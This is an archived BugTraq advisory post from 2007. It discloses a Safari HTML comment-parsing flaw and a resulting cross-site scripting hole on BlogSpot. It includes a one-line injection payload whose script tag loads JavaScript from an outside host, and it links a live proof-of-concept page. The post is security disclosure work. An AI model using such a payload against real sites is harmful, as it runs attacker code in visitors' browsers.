BugTraq
Safari Improperly Parses HTML Documents & BlogSpot XSS vulnerability Jan 23 2007 07:44AM
Jose Avila III (jose onzra com) (1 replies)
Overview:

Safari on occasions may improperly parse the source of an HTML
document, which can lead to the execution of html tags within
comments. This can become dangerous when input filters allow html
tags within comments, as they will get parsed and executed under
certain circumstances.

Details:

In some cases you can cause Apple?s Safari browser to execute code
when it should not be executed. In the following example everything
within the comment, in theory should never be executed; however,
safari decides to execute the script tag.

<title>myblog<!--</title></head><body><script src=http://beanfuzz.com/
bean.js> --></title>

Blogs hosted on BlogSpot.com have filter mechanisms for their input;
however, they will allow you to inject anything within comments. This
made it possible to cross site script blogspot.com. Note: Only Safari
viewers will be affected.

Proof of concept: http://dirtybean1234.blogspot.com/

Initial release of vulnerability: http://www.beanfuzz.com/wordpress/?
p=99

Vendor Response:

I was unable to get a response from the vendor in regards to this issue

Questions / Comments:
Jose (at) onzra (dot) com

----
Register for my RSA 2007 Training Course
"Creative Web Protocol Attacks, Beyond Web Hacking"
February 4, 5 2007 San Francisco
https://cm.rsaconference.com/US07/catalog/eventguide/publicSchedule.jsp

[ reply ]
Re: Safari Improperly Parses HTML Documents & BlogSpot XSS vulnerability Jan 24 2007 05:06AM
Robert Tasarz (robert tasarz greentech pl)


 

Privacy Statement
Copyright 2010, SecurityFocus